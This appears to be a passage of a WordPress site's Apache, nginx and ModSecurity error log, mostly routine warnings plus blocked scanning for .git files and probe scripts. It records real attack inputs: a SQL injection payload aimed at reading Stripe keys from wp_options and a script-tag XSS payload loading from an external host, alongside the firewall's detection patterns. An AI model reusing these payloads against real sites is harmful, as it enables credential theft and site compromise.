the server name [Thu Mar 28 03:26:17.466541 2024] [ssl:warn] [pid 16611:tid 140047084021632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 28 03:26:21.688286 2024] [ssl:warn] [pid 16612:tid 140047084021632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 28 03:26:22.144625 2024] [ssl:warn] [pid 16612:tid 140047084021632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 28 03:26:24.585779 2024] [ssl:warn] [pid 16612:tid 140047084021632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 28 03:26:26.862043 2024] [ssl:warn] [pid 17057:tid 139998228297600] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 28 03:26:31.068422 2024] [ssl:warn] [pid 17060:tid 139998228297600] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/03/28 08:50:51 [error] 17039#17039: *142938 access forbidden by rule, client: 18.140.63.75, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Mar 28 21:18:08.948969 2024] [:error] [pid 3466:tid 139997831173888] [client 77.221.153.125:52876] [client 77.221.153.125] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "text/plain"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZgYk4MyAqxIA39eOLoIzrwAAARE"] [Fri Mar 29 03:09:19.520526 2024] [ssl:warn] [pid 1203:tid 140113269294976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 29 03:09:31.733018 2024] [ssl:warn] [pid 1210:tid 140113269294976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 29 03:09:32.140911 2024] [ssl:warn] [pid 1210:tid 140113269294976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 29 03:09:33.834683 2024] [ssl:warn] [pid 1210:tid 140113269294976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 29 03:09:36.119390 2024] [ssl:warn] [pid 1677:tid 140472553170816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 29 03:09:40.317755 2024] [ssl:warn] [pid 1678:tid 140472553170816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 30 03:14:20.753215 2024] [ssl:warn] [pid 4877:tid 139817095690112] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 30 03:14:29.001342 2024] [ssl:warn] [pid 4879:tid 139817095690112] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 30 03:14:29.503779 2024] [ssl:warn] [pid 4879:tid 139817095690112] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 30 03:14:31.823457 2024] [ssl:warn] [pid 4879:tid 139817095690112] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 30 03:14:34.081807 2024] [ssl:warn] [pid 5300:tid 140039229097856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 30 03:14:42.287224 2024] [ssl:warn] [pid 5305:tid 140039229097856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 30 09:09:40.267709 2024] [autoindex:error] [pid 5997:tid 140038792726272] [client 31.220.102.210:56772] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Mar 31 03:11:20.502692 2024] [ssl:warn] [pid 10794:tid 140700834170752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 31 03:11:28.726687 2024] [ssl:warn] [pid 10800:tid 140700834170752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 31 03:11:28.983982 2024] [ssl:warn] [pid 10800:tid 140700834170752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 31 03:11:31.505592 2024] [ssl:warn] [pid 10800:tid 140700834170752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 31 03:11:33.797384 2024] [ssl:warn] [pid 11215:tid 140155711092608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 31 03:11:41.997078 2024] [ssl:warn] [pid 11218:tid 140155711092608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/04/01 00:44:23 [error] 11115#11115: *203687 access forbidden by rule, client: 206.189.233.36, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/04/01 00:44:26 [error] 11116#11116: *203835 access forbidden by rule, client: 188.166.108.93, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/04/01 00:44:27 [error] 11115#11115: *203906 access forbidden by rule, client: 139.162.141.82, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/04/01 00:44:28 [error] 11115#11115: *203951 access forbidden by rule, client: 147.182.200.94, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/04/01 00:44:28 [error] 11115#11115: *203955 access forbidden by rule, client: 206.189.19.19, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/04/01 00:44:30 [error] 11115#11115: *203995 access forbidden by rule, client: 209.38.208.202, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Mon Apr 01 00:44:35.337220 2024] [authz_core:error] [pid 11236:tid 140155453175552] [client 139.162.155.225:50018] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Mon Apr 01 00:44:36.679898 2024] [authz_core:error] [pid 11239:tid 140155411212032] [client 139.59.136.184:50028] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Mon Apr 01 00:44:38.847927 2024] [authz_core:error] [pid 11239:tid 140155327284992] [client 139.162.155.225:50042] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Mon Apr 01 00:44:40.025885 2024] [authz_core:error] [pid 11239:tid 140155453175552] [client 64.226.65.160:50050] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/04/01 00:44:40 [error] 11116#11116: *204068 access forbidden by rule, client: 139.162.155.225, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/04/01 00:44:41 [error] 11116#11116: *204071 access forbidden by rule, client: 139.59.136.184, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/04/01 00:44:45 [error] 11115#11115: *204094 access forbidden by rule, client: 139.162.155.225, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/04/01 00:44:45 [error] 11115#11115: *204099 access forbidden by rule, client: 64.226.65.160, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Apr 01 07:30:43.494185 2024] [autoindex:error] [pid 31584:tid 140712975259392] [client 4.227.95.150:58598] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Apr 01 07:30:50.007252 2024] [:error] [pid 31584:tid 140712817436416] [client 4.227.95.150:58618] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Apr 01 07:30:52.730238 2024] [autoindex:error] [pid 31584:tid 140712792258304] [client 4.227.95.150:58630] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Apr 01 07:30:55.489027 2024] [autoindex:error] [pid 31584:tid 140712800651008] [client 4.227.95.150:58642] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Apr 01 07:30:56.203422 2024] [autoindex:error] [pid 31584:tid 140712834221824] [client 4.227.95.150:58646] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Apr 01 07:31:00.785064 2024] [:error] [pid 31257:tid 140712792258304] [client 4.227.95.150:58660] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Apr 01 07:31:00.846388 2024] [:error] [pid 31584:tid 140712750294784] [client 4.227.95.150:58662] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Apr 01 07:31:22.650489 2024] [:error] [pid 31584:tid 140712941688576] [client 4.227.95.150:58730] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php [Mon Apr 01 07:31:25.081676 2024] [autoindex:error] [pid 31255:tid 140712859399936] [client 4.227.95.150:58738] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Apr 01 07:31:40.181217 2024] [:error] [pid 31257:tid 140712716723968] [client 4.227.95.150:58770] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Apr 01 07:31:49.243204 2024] [:error] [pid 31257:tid 140712767080192] [client 4.227.95.150:58804] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon Apr 01 07:32:51.378287 2024] [autoindex:error] [pid 31584:tid 140712958473984] [client 4.227.95.150:58970] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Apr 01 07:32:59.609996 2024] [:error] [pid 31256:tid 140712809043712] [client 4.227.95.150:58994] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Apr 01 07:33:01.937213 2024] [autoindex:error] [pid 31584:tid 140712733509376] [client 4.227.95.150:59004] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Apr 01 07:33:04.846083 2024] [autoindex:error] [pid 31584:tid 140712950081280] [client 4.227.95.150:59016] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Apr 01 07:33:05.572255 2024] [autoindex:error] [pid 31255:tid 140712851007232] [client 4.227.95.150:59020] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Apr 01 07:33:10.067830 2024] [:error] [pid 31584:tid 140712983652096] [client 4.227.95.150:59034] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Apr 01 07:33:10.128547 2024] [:error] [pid 31255:tid 140712834221824] [client 4.227.95.150:59036] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Apr 01 07:33:28.481274 2024] [:error] [pid 31257:tid 140712783865600] [client 4.227.95.150:59092] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php [Mon Apr 01 07:33:30.537317 2024] [autoindex:error] [pid 31257:tid 140712941688576] [client 4.227.95.150:59100] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Apr 01 07:33:40.673891 2024] [:error] [pid 31255:tid 140712750294784] [client 4.227.95.150:59130] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Apr 01 07:33:50.515621 2024] [:error] [pid 31257:tid 140712809043712] [client 4.227.95.150:59166] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon Apr 01 09:32:38.367455 2024] [:error] [pid 31584:tid 140712792258304] [client 156.38.128.82:33526] [client 156.38.128.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(union(.*?)select(.*?)from)))" at ARGS:calculate_attribute_counts[][taxonomy]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "225"] [id "981276"] [msg "Looking for basic sql injection. Common attack string for mysql, oracle and others."] [data "Matched Data: union%20all%20select%201%2Coption_value%20from found within ARGS:calculate_attribute_counts[][taxonomy]: %22%29%20union%20all%20select%201%2Coption_value%20from%20wp_options%20where%20option_name%20like%20%27%25stripe%25%27%3B%00"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/wp-json/wc/store/products/collection-data"] [unique_id "ZgrFhkZLuSnR025B4hMZHAAAAM8"] 2024/04/01 16:20:17 [error] 31250#31250: *218062 access forbidden by rule, client: 52.55.250.167, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/04/01 16:48:35 [error] 31249#31249: *218341 access forbidden by rule, client: 52.55.250.167, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/04/01 17:16:39 [error] 31250#31250: *218590 access forbidden by rule, client: 52.55.250.167, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/04/01 17:37:35 [error] 31249#31249: *218913 access forbidden by rule, client: 52.55.250.167, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/04/01 17:47:48 [error] 31250#31250: *218995 access forbidden by rule, client: 52.55.250.167, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/04/01 22:19:44 [error] 28446#28446: *222801 access forbidden by rule, client: 91.122.53.173, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2024/04/02 15:31:30 [error] 10389#10389: *235360 access forbidden by rule, client: 54.153.68.27, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/04/02 16:35:55 [error] 10389#10389: *236007 access forbidden by rule, client: 54.153.68.27, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/04/02 16:59:52 [error] 10388#10388: *236504 access forbidden by rule, client: 54.153.68.27, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/04/02 18:57:23 [error] 10388#10388: *237684 access forbidden by rule, client: 54.153.68.27, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/04/02 19:39:01 [error] 10388#10388: *238198 access forbidden by rule, client: 54.153.68.27, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Apr 03 03:17:24.786343 2024] [:error] [pid 4577:tid 140228375267072] [client 46.19.138.210:57804] [client 46.19.138.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "grub-client"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-emoji-release.min.js"] [unique_id "Zg0QlKWvlOQ_4IGjnOK10AAAAZQ"] 2024/04/03 07:16:17 [error] 17261#17261: *247020 access forbidden by rule, client: 83.147.52.37, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/04/04 02:48:13 [error] 14048#14048: *264896 access forbidden by rule, client: 83.147.52.37, server: investigacionperu.com, request: "GET /plugins/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/04/04 12:17:30 [error] 27566#27566: *272724 access forbidden by rule, client: 83.147.52.37, server: investigacionperu.com, request: "GET /config/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/04/04 16:50:32 [error] 27565#27565: *275525 access forbidden by rule, client: 36.90.64.216, server: mail.investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "mail.investigacionperu.com" 2024/04/04 16:50:33 [error] 27566#27566: *275526 access forbidden by rule, client: 36.90.64.216, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2024/04/04 22:12:01 [error] 1611#1611: *2051 access forbidden by rule, client: 83.147.52.37, server: investigacionperu.com, request: "GET /public/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/04/05 08:12:49 [error] 32532#32532: *6997 access forbidden by rule, client: 83.147.52.37, server: investigacionperu.com, request: "GET /src/.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Apr 05 09:30:17.811860 2024] [:error] [pid 32672:tid 140621557741312] [client 185.125.50.5:49868] [client 185.125.50.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:comment. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: >> found within ARGS:comment: This Dude Creates Bitc0in Out Of Thin Air [CRAZY]\\x0d\\x0a\\x0d\\x0aI didn\\xe2\\x80\\x99t believe it either at first\\xe2\\x80\\xa6\\x0d\\x0a\\x0d\\x0aUntil i saw it works in action >> https://ext-opp.com/Coinz\\x0d\\x0a\\x0d\\x0aYou see, Bitc0in and the entire Crypt0 market is about to go through the rough\\xe2\\x80\\xa6 \\x0d\\x0a\\x0d\\x0aSome smart people will get in now, and make massive gains,\\x0d\\x0aAnd some will stand and watch people make money\\xe2\\x80\\xa6 \\x0d\\x0a\\x0d\\x0aUl..."] [sev [hostname "investigacionperu.com"] [uri "/wp-comments-post.php"] [unique_id "ZhAK-fpQdY_4B0o-zFvs-QAAAJA"] [Fri Apr 05 14:24:12.235290 2024] [:error] [pid 32672:tid 140621524170496] [client 89.248.174.9:56176] [client 89.248.174.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://cdn.mediajsdelivery.com></script> found within ARGS:result[_msg]: <script src=https://cdn.mediajsdelivery.com></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "ZhBP3PpQdY_4B0o-zFvuzQAAAJQ"] [Fri Apr 05 14:24:12.528065 2024] [:error] [pid 917:tid 140621737264896] [client 89.248.174.9:56178] [client 89.248.174.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://cdn.mediajsdelivery.com></script> found within ARGS:result[_msg]: <script src=https://cdn.mediajsdelivery.com></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "ZhBP3HgiczosjXcWgw9OeQAAAMM"] [Sat Apr 06 18:00:32.521081 2024] [:error] [pid 19027:tid 140599395063552] [client 4.227.105.22:51120] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sat Apr 06 18:00:58.904355 2024] [:error] [pid 19027:tid 140599361492736] [client 4.227.105.22:51212] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Apr 06 18:00:58.982075 2024] [:error] [pid 18335:tid 140599319529216] [client 4.227.105.22:51214] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Apr 06 18:02:16.472689 2024] [autoindex:error] [pid 18337:tid 140599525263104] [client 4.227.105.22:51470] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Apr 06 18:02:38.533495 2024] [:error] [pid 19027:tid 140599361492736] [client 4.227.105.22:51532] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Apr 06 18:02:39.567279 2024] [autoindex:error] [pid 18336:tid 140599336314624] [client 4.227.105.22:51536] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Apr 06 18:02:40.506834 2024] [autoindex:error] [pid 19027:tid 140599311136512] [client 4.227.105.22:51542] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Apr 06 18:02:51.137615 2024] [:error] [pid 18335:tid 140599319529216] [client 4.227.105.22:51576] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Apr 06 18:02:51.277023 2024] [:error] [pid 18335:tid 140599378278144] [client 4.227.105.22:51578] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Apr 06 18:03:47.575625 2024] [:error] [pid 18335:tid 140599542048512] [client 4.227.105.22:51778] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sat Apr 06 18:04:18.122249 2024] [:error] [pid 19027:tid 140599378278144] [client 4.227.105.22:51882] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Apr 06 18:04:18.317696 2024] [:error] [pid 18335:tid 140599428634368] [client 4.227.105.22:51884] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Apr 06 18:05:46.898066 2024] [autoindex:error] [pid 18337:tid 140599437027072] [client 4.227.105.22:52170] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Apr 06 18:06:04.869917 2024] [:error] [pid 19027:tid 140599311136512] [client 4.227.105.22:52238] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Apr 06 18:06:05.785133 2024] [autoindex:error] [pid 18337:tid 140599420241664] [client 4.227.105.22:52242] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options 